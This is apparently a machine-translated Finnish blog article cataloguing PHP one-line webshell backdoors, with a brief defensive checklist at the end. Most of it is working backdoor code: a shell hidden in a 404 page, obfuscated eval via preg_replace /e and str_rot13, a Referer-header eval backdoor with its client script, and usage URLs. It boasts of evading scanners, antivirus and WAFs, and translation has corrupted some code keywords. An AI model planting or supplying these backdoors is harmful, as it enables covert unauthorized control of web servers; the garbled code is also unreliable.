Käsittelemme näitä PHP-backdoor-ohjelmia oppimismielellä, ja paljon PHP:n takaovikoodista näkemään, kuinka hyväntahtoisia ohjelmoijat ovat.
Tehokas PHP-takaovi yhdellä lauseella
Tällainen takaovi mahdollistaa verkkosivustot,Palvelimen ylläpitäjät ovat hyvin hankalia ja joutuvat usein muuttamaan metodeja suorittaakseen erilaisia havaitsemisia, eikä monia uusia kirjoitustekniikoita löydetä ja käsitellä tavallisilla tunnistusmenetelmillä.
Tänään luettelemme mielenkiintoisia PHP-troijalaisia.
1. Piilota PHP-ponit 404 sivun avulla:
[mw_shl_code=php,totta] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 ei löytynyt</title> </head><body> <h1>Ei löytynyt</h1> <p>Pyydettyä URL-osoitetta ei löytynyt tältä palvelimelta.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Ei Löytynyt'); ?>[/mw_shl_code]
404-sivu on yleisesti käytetty tiedosto verkkosivustolla, ja harva tarkistaa ja muokkaa sitä sen jälkeen, kun se on yleisesti suositeltu, joten voimme käyttää tätä piilottamaan takaportin.
2. Ominaisuudeton piilotettu PHP yhdessä lauseessa:
[mw_shl_code=php,totta]<?php session_start(); $_POST['code'] & $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a'); ?>[/mw_shl_code]
Määritä $_POST['code'] $_SESSION['theCode'], ja suorita sitten $_SESSION['theCode'], jonka kohokohta on, ettei allekirjoituskoodia ole.
Jos käytät skannaustyökalua koodin tarkistamiseen, se ei hälytä ja saavuttaa tavoitteen.
3. Super Stealthy PHP Backdoor:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?> [/mw_shl_code]
Pelkkä GET-funktio muodostaa troijalaisen;
Näin käytetään:
[mw_shl_code=php,totta] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Suorituksen jälkeen nykyinen hakemisto generoi lauseen Troijalainen c.php, kun parametri A on arvostettu, virhe Troijan generointi epäonnistui, ja kun se vahvistetaan, se raportoi myös virheen, mutta luo Troijan hevosen, jota ei voi aliarvioida.
Tasopyyntö, koodi PHP:n takaoven ajamiseen:
Tämä menetelmä toteutetaan kahdella tiedostolla, tiedosto 1
[mw_shl_code=php,totta]<?php
//1.php header('Content-type:text/html; charset=utf-8′); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10'&& count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
} ?>[/mw_shl_code]
Asiakirja 2
[mw_shl_code=php,totta]<?php
//2.php header('Content-type:text/html; charset=utf-8′);
//要执行的代码 $code= <<<KOODI phpinfo(); KOODI;
//进行base64编码 $code= base64_encode($code);
//构造referer字符串 $referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url $url= 'http://localhost/test1/1.php'; $ch= curl_init(); $options= taulukko( CURLOPT_URL => $url, CURLOPT_HEADER => VÄÄRIN, CURLOPT_RETURNTRANSFER => TOTTA, CURLOPT_REFERER => $referer ); curl_setopt_array($ch, $options); echocurl_exec($ch); ?>[/mw_shl_code]
Aja base64-koodattua koodia HTTP-pyynnön HTTP_REFERER:n kautta takaporttivaikutuksen saavuttamiseksi.
On hyvä käyttää tätä ideaa WAF:n ohittamiseen.
4.PHP takaporttigeneraattorityökalu Weevely
weevely on PHP-kohtainenWebshellin ilmainen ohjelmisto voidaan käyttää simuloimaan yhteyskuorta kuten telnet. Weevelyä käytetään yleensä web-ohjelmien hyödyntämiseen, takaovien piilottamiseen tai telnet-tyyppisten menetelmien käyttöön verkkosivupohjaisen hallinnan sijaan. Weevelyn tuottama palvelinpuolen PHP-koodi on base64-koodattu, joten se voi huijata valtavirran virustorjuntaohjelmistoja ja IDS:ää. Kun olet ladannut palvelinpuolen koodin, voit yleensä ajaa sen suoraan Weevelyn kautta.
Backdoorissa käytetyt funktiot ovat yleisesti käytettyjä merkkijonojen käsittelytoimintoja, ja esimerkiksi arviointi- ja järjestelmätoiminnot, joita käytetään tarkastussääntöinä, eivät näy suoraan koodissa, joten backdoor-tiedosto voi ohittaa takaoven hakutyökalun tarkistuksen. Skannaus pimeän ryhmän web-takaoven tunnistustyökalulla osoittaa, ettei tiedosto ole uhattuna.
Yllä oleva on yleinen johdanto, eikä asiaankuuluvia käyttötapoja tässä esitellä, mikä on yksinkertainen tieteellinen popularisointi.
4. Kolme epämuodostunutta yhden lauseen PHP-troijalaista Ensimmäinen:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?> [/mw_shl_code]
Toinen
[mw_shl_code=php,totta]<?php $_=“”; $_[+“”]=”; $_=“$_”.“”; $_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Kirjoita http://site/2.php?_=assert&__=eval($_POST['pass']) salasana keittiöveitseen on pass.
Jos käytät keittiöveitsen lisätietoja, se on piilossa, tai voit käyttää muita injektiovälineitä, koska se lähetetään jälkikäteen.
Kolmas
[mw_shl_code=php,totta] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'add'); [/mw_shl_code]
str_rot13 ('riny') on koodattu arviointi, joka täysin välttää avainsanat menettämättä vaikutusta, jolloin ihmiset oksentavat verta!
5. Lopuksi listaa muutama edistynyt PHP Troijanin takaportti:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $hh("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid']; sisältää($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,tosi]$reg="c"." o”.“ p”.“ y”; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); [/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”; $gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST [mw_shl_code=php,totta]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Yhteenvetona: nämä PHP-takaovet voidaan kuvata täydellisiksi, jos et ole varovainen, sinut varmasti huijataan, ja mikä on artikkelimme tärkein prioriteetti tänään? Keskeiset kohdat löytyvät alla olevasta yhteenvedosta!
Miten käsitellä PHP:n yhden lauseen takaporttia: Korostamme muutamia keskeisiä kohtia, ja jos luet tämän artikkelin, uskon ettet ole maallikko, joten en aio olla pitkä:
- Ole tietoinen tietoturvasta PHP-ohjelmia kirjoittaessasi
- Palvelinlokitiedostoja tulisi lukea usein ja varmuuskopioida usein
- Tiukka lupa jokaiselle paikalle
- Säännölliset eräajoturvatarkastukset dynaamisissa tiedostoissa ja hakemistoissa
- Opi suorittamaan manuaalinen virustorjunta "Käyttäytymisen arviointi ja tappaminen"
- Pysy kuulolla tai soluttaudu aktiiviseen kyberturvallisuusleiriin
- Jopa funktiota voidaan käyttää sääntönä palvelinympäristön hierarkkiseen käsittelyyn
Uskomme, että kun hallittavia sivustoja on enemmän ja paljon dataa, meidän tulisi kohtuudella käyttää aputyökaluja, mutta emme saa täysin luottaa näihin työkaluihin, teknologia päivittyy ja kehittyy jatkuvasti, tärkeintä on, että opit ja ymmärrät, miten kirjoittaa näitä voimakkaita takaportti-ihmisiä, ja roolien vaihto voi tuoda suurempaa edistystä.
|